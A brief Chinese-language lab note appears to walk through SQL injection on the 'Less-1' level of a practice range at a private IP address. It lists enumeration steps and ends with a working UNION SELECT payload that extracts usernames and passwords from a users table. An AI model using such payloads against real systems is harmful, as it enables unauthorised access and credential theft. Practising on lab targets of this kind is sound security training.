靶场http://172.16.58.244:83/Less-1/
1,可控参数是否能影响显示结果
2能够报错
判断是单引号注入
注释 %23 # —+ /*都可以注释
判断字段
查看所有数据库
查看当前数据库
查看所有字段
查看当前数据库所有字段
查看数据库字段内容
因为我们找到了数据库和表,这里可以直接调用
http://172.16.58.244:83/Less-1/?id=132’ union select 1,group_concat(concat_ws(“:”,username,password)),3 from security.users —+
security